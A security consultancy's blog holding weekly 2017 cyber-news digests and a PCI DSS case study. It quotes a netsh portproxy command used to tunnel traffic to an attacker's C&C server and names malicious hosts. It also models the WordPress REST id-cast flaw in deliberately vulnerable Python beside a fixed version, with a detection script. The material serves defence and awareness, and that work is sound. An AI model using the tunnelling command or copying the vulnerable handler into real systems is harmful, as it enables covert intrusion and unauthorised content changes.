Saturday, February 18, 2017

Cyber Updates - 18/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft has not published its famous Patch Tuesday this month due to "a last minute issue that could impact some customers and was not resolved in time". This is presumably due to their difficulties in fixing the latest SMB v3 vulnerability that was reported in the last "cyber updates" post. This means that all Windows machines are still vulnerable to a server-side remote code execution exploit.

Here are their details:
https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/

(2) Yahoo was hacked. No, this is not the same hack as in 2013 that was recently published, but rather a new hacking attempt.
Instead of stealing the (hashed) passwords, this time the attackers used forged cookies in order to log in to the victims' accounts without their consent.

Here are all the details:
https://help.yahoo.com/kb/SLN27925.html?impressions=true

(3) Security researchers have shown that websites can track your online activity even if you switch to a different browser. The websites run a set of tasks that measure the following characteristics: time zone, number of CPU cores, GPU, hash values of GPU rendering results, plugins, fonts, audio, screen ratio and depth, WebGL, ad blocking, canvas, cookies, encoding, and language. According to the research, the attackers were able to successfully identify 99.2% of the users.

Here are all the details:
http://thehackernews.com/2017/02/cross-browser-tracking.html

Stay tuned for more updates,



Dan Gurfinkel
Head of Offensive Security & Response Unit

Saturday, February 11, 2017

Cyber Updates - 11/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft Office allows its users to add a macro script that is executed when the document is opened. While this is usually used for formula calculations, attackers have used it to execute malicious code on their victims' workstations, and in particular to infect them with ransomware (such as the Locky ransomware).
Today, the first Word macro malware targeting Mac OS was discovered. The malware downloads another file from https://www.securitychecking.org/index.asp and decrypts it (the file is RC4-encrypted). The malware then executes the decrypted file.

Organizations that use Mac OS systems are requested to check whether any machine has queried the following malicious DNS record: www.securitychecking.org



(2) Numerous banks worldwide have been targeted by malware that resides only in the server's memory. Kaspersky reported that its incident response team was called in after Meterpreter code was found in the memory of a bank's domain controller.
What's interesting about this attack is that the attackers used the netsh.exe utility (a built-in tool) to tunnel traffic from the victim's host to the attacker's C&C servers. In particular, the following command was used:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=<IP> connectport=8080 listenaddress=0.0.0.0

This caused the infected machine to listen on port 4444 and forward that traffic to <IP> on port 8080.
Thus, a legitimate tool (netsh.exe) was used to let internal workstations and computers communicate with an external C&C server, even when direct communication between the internal machines and the internet is blocked by the organization's firewall.

Here are some artifacts generated in the Windows registry that will quickly allow an organization to determine if one of their machines was infected:


  • HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the sc.exe utility
  • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the netsh.exe utility
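As an added example (not from the original post), here is a small Python script that parses the output of `netsh interface portproxy show v4tov4` and flags rules that listen on all interfaces or forward to an address outside the private ranges, which is the pattern the command above creates. The table text is a constructed sample in the tool's layout, and 203.0.113.5 is a documentation-range stand-in for an external address.

```python
import ipaddress
import re
from typing import Dict, List

# Constructed sample of "netsh interface portproxy show v4tov4" output
# (not captured from a real host; 203.0.113.5 is a documentation-range
# address standing in for an attacker-controlled external host).
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4444        203.0.113.5     8080
127.0.0.1       8443        10.20.30.40     443
"""

# A data row is: listen-address, listen-port, connect-address, connect-port.
# Header and separator lines fail the \d+ port groups and are skipped.
ROW_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")

# Ranges we treat as "internal"; anything else counts as an external target.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def parse_portproxy(text: str) -> List[Dict[str, object]]:
    """Turn the portproxy table into a list of rule dicts."""
    rules = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        listen_addr, listen_port, connect_addr, connect_port = m.groups()
        rules.append({
            "listen_addr": listen_addr,
            "listen_port": int(listen_port),
            "connect_addr": connect_addr,
            "connect_port": int(connect_port),
        })
    return rules


def is_external(addr: str) -> bool:
    """True when the connect target lies outside INTERNAL_NETS.

    A hostname cannot be classified offline, so it is treated as external."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True
    return not any(ip in net for net in INTERNAL_NETS)


def suspicious_rules(text: str) -> List[Dict[str, object]]:
    """Rules that accept traffic on every interface or forward it outside.

    Either property matches the netsh command quoted in the update:
    listenaddress=0.0.0.0 and an external connectaddress."""
    return [r for r in parse_portproxy(text)
            if r["listen_addr"] == "0.0.0.0" or is_external(r["connect_addr"])]


if __name__ == "__main__":
    for r in suspicious_rules(SAMPLE_OUTPUT):
        print(f"suspicious portproxy: {r['listen_addr']}:{r['listen_port']} -> "
              f"{r['connect_addr']}:{r['connect_port']}")
```

On a Windows host, feed `suspicious_rules` the captured output of the netsh command instead of `SAMPLE_OUTPUT`; an empty result means no portproxy rule is configured, which is the normal state for a workstation.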

(3) This has not been the best week (in terms of cyber security) for banks. Numerous Polish banks have been hacked, and the interesting part is that the attack originated from KNF - the Polish authority in charge of the safety and security of banks in Poland. Apparently, someone hacked KNF's website and modified a JavaScript file to contain malicious content.

Clients are advised to block access to the following hosts:
  • sap.misapor.ch
  • www.eye-watch.in
  • 125.214.195.17
  • 196.29.166.218



(4) Last week I mentioned the ransomware that targeted a hotel in Austria; this week it was IHG's turn to be infected by malware. About 12 InterContinental point-of-sale machines have been hacked, allowing the attackers to obtain credit card data.

The following link lists all infected properties: https://www.ihg.com/content/us/en/customer-care/protecting-our-guests. Be sure to check if you've purchased anything there!


(5) 76 popular iOS applications are vulnerable to MiTM attacks. Some are very widely used, such as Snapchat, which is vulnerable to a MiTM attack that allows attackers to steal your credentials (username and password).


Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Friday, February 3, 2017

Cyber Updates - 03/02

Hey all,
Here are this week’s cyber updates.

(1) Windows 8 & 10 are vulnerable to a server-side memory corruption vulnerability (CVE-2017-0016) in the SMB service. The vulnerability allows attackers to conduct a denial of service attack (BSOD) and possibly even execute code on the remote machine.
Currently, Microsoft has yet to issue a fix for this vulnerability, and an exploit for it has reportedly been seen in the wild.
Please restrict SMB traffic in the firewall until a patch is issued by Microsoft.

Here are all the details:


(2) Guests of the Romantik Seehotel Jaegerwirt hotel could not enter their rooms as their keycards were not working, and some guests’ reservations were gone from the system. Apparently, the computers running the electronic key locks were infected with ransomware.

If you ask me, this just shows you the difference between a generic attack and a target-driven approach. The attackers could have easily collected all guests’ credit card details for years, allowing them to earn much more than the paid ransom (1,500 EUR).

In this case, the hotel had to pay the ransom ASAP, as any other alternative would have ended up with very unhappy guests. But I guess they are already used to it, as the very same hotel was hacked three times before this incident.
Now you would think that the hotel would want to protect its systems and prevent such an incident from reoccurring. Well, the hotel management found a rather “creative” solution – they are considering switching back to actual door keys and locks instead of key cards and electronic locks.

Here are all the details:

(3) WordPress just patched their environment against 0-day vulnerabilities. One of the bugs existed in their REST API, allowing remote privilege escalation as well as content injection. In effect, the exploit allowed any unauthenticated user to modify all pages.
In particular, when calling /wp-json/wp/v2/posts/123?id=456ABC, WordPress checks whether the user has permission to edit post id 456ABC, and exits if they don’t. Since such a post doesn’t exist (post ids should be numeric), there is nothing to deny, and the code then calls update_item, which should have failed again. However, update_item casts the parameter to an int, changing the value to 456. Now a malicious unauthenticated user can update item 456 (which is a valid and existing post).
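The id confusion described above, modelled as an added Python example (not WordPress code): a simplified post store, a permission check that looks up the raw id, and a handler that casts it the way PHP's (int) cast does. `php_int_cast` is a hypothetical helper that mimics that cast, and `get_post` is a simplified lookup that only resolves exactly numeric ids; the hardened flow shows one way to close the gap by canonicalising the id once and denying when the post is absent.

```python
import re
from typing import Dict, Optional

# Constructed in-memory "posts table": id -> post record.
POSTS: Dict[int, Dict[str, str]] = {
    123: {"title": "Hello world", "author": "alice"},
    456: {"title": "Quarterly report", "author": "bob"},
}


class Forbidden(Exception):
    """Raised when a request is denied by the permission check."""


def php_int_cast(value: str) -> int:
    """Hypothetical helper mimicking PHP's (int) cast on a string:
    leading digits are kept and the rest is dropped, so '456ABC' -> 456
    and 'ABC' -> 0."""
    m = re.match(r"^\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def get_post(post_id) -> Optional[Dict[str, str]]:
    """Simplified lookup: only an exactly numeric id resolves to a post,
    so '456ABC' finds nothing (the behaviour the update relies on)."""
    if isinstance(post_id, str):
        if not post_id.isdigit():
            return None
        post_id = int(post_id)
    return POSTS.get(post_id)


def can_edit(user: Optional[str], post: Dict[str, str]) -> bool:
    """Only the author may edit; an unauthenticated user (None) never can."""
    return user is not None and post["author"] == user


def vulnerable_update(user: Optional[str], raw_id: str, new_title: str) -> str:
    """Permission check and handler disagree about which post 'id' names."""
    post = get_post(raw_id)                 # '456ABC' -> None ...
    if post and not can_edit(user, post):   # ... so nothing is denied
        raise Forbidden("cannot edit this post")
    post_id = php_int_cast(raw_id)          # '456ABC' -> 456
    target = get_post(post_id)
    if target is None:
        raise KeyError("no such post")
    target["title"] = new_title             # write to a post never checked
    return f"updated {post_id}"


def hardened_update(user: Optional[str], raw_id: str, new_title: str) -> str:
    """Canonicalise once, reject malformed ids, deny when the post is absent,
    and check permissions on the same object that is later modified."""
    if not raw_id.isdigit():
        raise ValueError("id must be numeric")
    post_id = int(raw_id)
    post = get_post(post_id)
    if post is None or not can_edit(user, post):
        raise Forbidden("cannot edit this post")
    post["title"] = new_title
    return f"updated {post_id}"


def outcome(fn, *args) -> str:
    """Run a flow and report its return value or the exception class name."""
    try:
        return fn(*args)
    except Exception as exc:
        return type(exc).__name__


if __name__ == "__main__":
    print(outcome(vulnerable_update, None, "456ABC", "defaced"))   # updated 456
    print(outcome(hardened_update, None, "456ABC", "defaced"))     # ValueError
```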

Here are all the details:

(4) Netgear routers have been found to contain 31 different vulnerabilities, including unauthenticated password disclosure. While by default the admin interface is not publicly accessible, this vulnerability can be used by internal attackers to infect routers, possibly allowing a malicious entity to build a large botnet for DDoS attacks. Alternatively, the attacker can conduct MiTM attacks. Think about it the next time you connect to a Starbucks Wi-Fi network.

Here are the details:

Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Thursday, February 2, 2017

New Official PCI SSC Guidelines - “Best Practices for Securing E-commerce”

The new PCI SIG guidance, “Best Practices for Securing E-commerce”, was published several days ago.

SIGs (Special Interest Groups) are a formal PCI SSC professional program that allows QSAs, merchants, vendors and basically every member of the PCI community to work together and contribute on specific PCI areas that require clarification or additional guidance.

The SIGs always contain valuable information and are one of the best ways to keep close to PCI SSC, anticipate trends and be a few steps ahead of our clients.

I have included here the new supplement and also the email sent by Troy Leach (PCI SSC’s CTO), received by myself amongst all of the SIG participants, to show the spirit and team effort that went into this one.

You can see that, as always, Comsec is credited and acknowledged inside the published document for our valuable contribution and participation.

Nadav.

Nadav Shatz, PCI QSA  
Managing Director
T: +44 (0)203 463 8727 | M: +44 (0)7788 533 344

Sunday, January 22, 2017

Cyber Updates - 22/01

Hey everyone,
Here are this week’s cyber updates:

(1) Comsec advises its clients to restrict outbound network access from the organization, in order to prevent data leakage to a C&C server.
Recently, Google’s infrastructure was found to be used as a C&C “server”. Such services are usually whitelisted, and thus allow attackers to extract data from organizations.
The script sends and receives commands to and from the Google Apps Script, Google Sheets, and Google Forms services. For each infected user a unique Google Sheets spreadsheet is dynamically created in order to manage that victim. The use of a legitimate third-party service like this gives the attacker the ability to hide in plain sight.





(2) Facebook has been hacked. While the previous cyber updates post was about Google, it wasn’t really Google’s fault; this time Facebook was really hacked.
The website was found to contain a remote code execution vulnerability in its ImageMagick parsing library (CVE-2016-3714).

In particular, Facebook has an API that takes a URL as a parameter, fetches the image stored at that URL and displays it back to the end user. By using an image crafted to trigger the ImageMagick vulnerability, security researcher Andrew Leonov showed Facebook how he could execute commands on the server and extract their output via DNS tunneling.

(3) This has not been Facebook’s week. Hackers have also found that Facebook voice messages are vulnerable to SSL strip attacks.

In particular, Facebook’s CDN servers do not enforce an HTTP Strict Transport Security (HSTS) policy, which is what permits this flaw.


And here’s a PoC video: https://youtu.be/9y0cov6dHb4

(4) A new denial of service vulnerability was recently discovered in iOS.
In particular, anyone can crash your iPhone or iPad by just sending an emoji-filled iMessage.
All you have to do to trigger this attack is send an iMessage containing the following: A white Flag emoji, the digit "0" and a Rainbow emoji. Your victim’s iPhone will crash even if they didn’t open the message!

Here’s the PoC video: https://youtu.be/G0iPhSuiMpk?t=130

(5) The Donald being sworn in as president couldn’t pass without a cyber-attack.
A radio station in Louisville was hacked, causing it to play anti-Trump songs for nearly 15 minutes. The hackers most probably used software meant for emergency broadcasts in order to override the program that was on air at the time of the hack.



Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Sunday, January 15, 2017

PCI DSS Optimisation -- Comsec's Award Winning PCI DSS Case Study!

“How I rebuilt organisational security strategy and BAU thanks to Comsec Group and PCI DSS”
Client story.

The client: “Fundgate” (pseudonym – the firm chose to remain anonymous) - an online financial services provider.

Fundgate is a global financial and payment service provider, operating in more than 200 countries and serving millions of users around the world. It is considered a global leader in the field of online payments and money transfer, and a well-known and respected player in the online financial services industry.
As the business evolved and developed, security threats and risks also evolved and became part of the business landscape. At the same time, the company developed a strong awareness and knowledge of information security and of the risks and threats to its business from the security perspective.
Fundgate is no stranger to security compliance, and PCI DSS compliance in particular. Operating across the globe and working closely with the card schemes, the company was very quick to address and adopt PCI DSS soon after it was published in 2006. The company achieved PCI DSS compliance and has maintained it ever since.
One of the company’s core principles has always been that each function of the organisation should support the business and create value for it. This includes IT, risk, HR, compliance, third parties and suppliers.
Fundgate runs a large IT infrastructure to support the business and the product environment. The infrastructure consists of multiple product teams with fast-paced DevOps application delivery, organised in product silos that are as product-orientated as they are business-focused.

Fundgate performed a market search and decided to meet with Comsec, a well-known and experienced QSA company, as a result of re-evaluating their PCI DSS compliance framework.
This re-evaluation came as a result of concerns that PCI DSS compliance was becoming less effective and in some cases even conflicting with the company’s IT and security framework. Through an internal assessment and market analysis, Fundgate discovered that the great amount of resources, time, energy and money spent on PCI DSS related solutions and activities had little justification and value and should be utilised more effectively.

After several discussions, Fundgate hired Comsec to take over its PCI DSS compliance programme and to “optimise” the compliance programme and efforts.


Phase 1: Initial Assessment
After a short period of working together, Comsec’s QSAs concluded that the company was indeed on “auto-pilot” with regards to PCI DSS compliance, and that a broad change was needed and had to be implemented, not only to truly maintain PCI DSS compliance at all times but, more importantly, to address and protect against the security threats the company was facing. Fundgate had to rethink information security, governance and PCI DSS compliance.
Among the issues that Comsec’s QSA team identified:
- Senior management was not adequately involved in the PCI DSS compliance programme.
- PCI DSS compliance was treated as an annual project, a “snapshot”, and not as a continuous process and effort.
- Culturally, PCI DSS was considered an unwanted practice, one that damages and slows down the business.
- Over the years, knowledge of the PCI regulation decreased in the IT and security teams, leading to the “auto-pilot” state and the lack of involvement of senior management.
- Changes were not addressed: services involving card data were not assessed properly, resulting in an incorrect PCI DSS scope (in-scope/out-of-scope issues).
- The client’s PCI personnel were in many cases not in sync with the security and IT teams.
- PCI DSS controls and processes were in many cases disconnected and separated from organisational information security controls and processes, rather than being integrated into the organisational security framework.
- Operationally, many of the PCI DSS controls and processes were disrupting and slowing down other business processes such as development, product release cycles and IT operations, as a result of improper environment and process management.
- Security controls’ effectiveness was limited: they were only implemented and used in the PCI DSS environment (scope).

Phase 2: Implementation
After understanding the difficulties and issues surrounding PCI at Fundgate, Comsec’s QSA team proceeded to the next phase: implementing PCI DSS compliance and controls in the correct way, using the three core values and principles that guide Comsec’s PCI QSA practice throughout its work:

Three areas of value to the organisation:
1. Information Security Focus
o Implementing and maintaining PCI DSS compliance not by addressing generic requirements and “filling in the PCI checklist”, but by understanding the business context, threats and risks, and then designing and implementing the security controls, solutions and products that fit the environment and also meet the PCI DSS requirements.
o “The big picture”: a holistic approach. Understanding that information security comes first and that any compliance framework has to be aligned with the organisational IS strategy. Controls and processes are integrated and coherent with the overall security and compliance framework of the entity by:
§ Multi-standard environment: addressing the other relevant security standards, regulations and frameworks the company adheres to, and aligning the PCI DSS framework accordingly.
§ PCI-related BAU activities (security testing, change management, IT security and others) are aligned, applicable and cover the wider information security context. For example, penetration testing is not limited to the PCI DSS environment and requirements but also covers other environments and standards, thus increasing the value of the single activity to the organisation.


2. Cost-effectiveness
o “Back to basics”: put the emphasis on the intent of the PCI requirements and security controls and design suitable processes, not on products and tools. In many cases security controls can be implemented using simple practices. In many other cases a manual approach to a security control or process can be faster, more effective and more cost-effective than its automated tool equivalent.
o Solutions/products: remove unnecessary tools and products utilised as part of the PCI DSS controls/requirements. These can be expensive, and the same result can easily be achieved using manual or open-source tools.
o Scope reduction: through expert consulting, Comsec’s experienced QSA team was able to reduce the scope of the PCI DSS environment and requirements, offering greater flexibility in addressing requirements and suggesting compensating controls where possible, to help reduce costs and unnecessary work.

3. Business Focus
o PCI DSS compliance is part of organisational information security, which is part of the organisation’s business.
o Security controls fit into the business and product environment.
o Implementing information security business-as-usual practices that support the business and operations.
o Financial services expertise and experience: Comsec has been working with all the leading financial and payment entities, including Visa and Mastercard, on their card data security programmes since before the establishment of the PCI Security Standards Council, and in the early stages of formulating the guidelines later known as PCI DSS. This gives unmatched experience and know-how in the financial services sector.



Phase 3: Results and Client testimonials (anonymized)
“Comsec has been a true partner both for PCI DSS compliance and for Information Security”
· Enabled my company not just to tick the boxes of the standard’s controls, but to design the right PCI DSS compliance framework for my organisation
· Reduced the costs of compliance and at the same time improved efficiency and effectiveness
· PCI is no longer a burden on the company’s resources, but is seen as an important tool to confront our risk and security threat environment.
· Security makes sense now more than ever - security controls, solutions, products and processes work in harmony and are relevant to the requirements and the security threats.
· Employees are involved in information security more than ever and actually understand the PCI DSS requirements.

•  Demonstrable best-in-class abilities in the business area under review
Throughout the project, Comsec demonstrated what is expected from a cutting-edge, leading consultancy: total partnership and commitment to the client’s objectives – business, professional and operational. Comsec performed a PCI DSS scoping that took in the organisation’s business environment, internal processes and philosophy, to create a tailored PCI DSS compliance framework that fits the organisation’s principles and operations.
•  Clear project management and process reengineering expertise
Comsec dedicated a senior, experienced project manager (director level) with vast experience across hundreds of PCI-related projects and specific industry experience in the financial and online sectors. This comes from Comsec’s approach that PCI DSS processes and controls are not stand-alone and do not operate in a vacuum, and must consider the business, operational and even cultural aspects of an organisation. Only with great experience and professional knowledge can the two be combined successfully.
•  Mastery of the latest technological solutions
Comsec’s QSA team for the project consisted of a top-level technical consultant with the most up-to-date knowledge of current security solutions and products.
•  Understanding of the very latest regulatory requirements
Additionally, Comsec’s lead QSA is an experienced consultant and auditor for many security standards and best practices (PA-DSS, PCI P2PE, ISO 27001, COBIT 5, data privacy and more), which gives a broad vision of the regulatory environment.
•  The successful delivery of a core strategic initiative / set of client objectives
Through expert consulting, Comsec’s experienced QSA team worked together with the client to achieve the project targets while optimising the PCI DSS compliance process, including reducing the scope of the PCI DSS environment and requirements, providing greater flexibility in addressing the requirements and suggesting compensating controls where possible, to help reduce costs and unnecessary work.
•  On budget, on time
Comsec managed to reduce the annual budget associated with PCI DSS in the organisation by removing irrelevant products and practices from the framework and optimising the overall process and security controls effectiveness.
•  Successful integration with existing client infrastructure
Working together with Fundgate, Comsec successfully integrated PCI DSS compliance maintenance with the client’s existing IT and security operations governance framework. This was a complete re-engineering of the previous PCI DSS compliance framework, which did not fit seamlessly into the organisational framework.
•  Access to the right technology partners for the job
Comsec helped the company compare and choose the right suppliers and products for the business.


Cyber Updates - 14/01

Hey all,
Here are this week’s cyber updates.

(1) I’m pretty sure most of you are aware of Google Chrome’s (as well as other browsers’) auto-fill feature. This feature allows Chrome to automatically fill in your personal information on websites in order to speed up registration processes.
What most of you don’t know is that hidden fields are auto-filled too, and thus submitted to the website’s owner. This allows a website to collect personal information without the user’s consent.


If you didn’t understand this one, please let me know and I’ll send you a link to another website, with an example of stealing your credit card info :)

(2) Cellebrite, the Israel-based company that allegedly helped the FBI hack the iPhone, was hacked.
The my.Cellebrite database was hacked, allowing the hackers to extract over 900GB of customer data.


(3) The Brazilian government accidentally tweeted a link to a Google Drive Excel spreadsheet, which contained a list of plain-text passwords for social media accounts (Facebook, Gmail, Twitter, Instagram and more).
It appears that the tweet accidentally contained a copy-pasted link to the spreadsheet instead of the intended URL.

They really should be more careful with their tweets, but more than that, I couldn’t help but wonder why they didn’t enforce any permissions on Google Drive…


Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit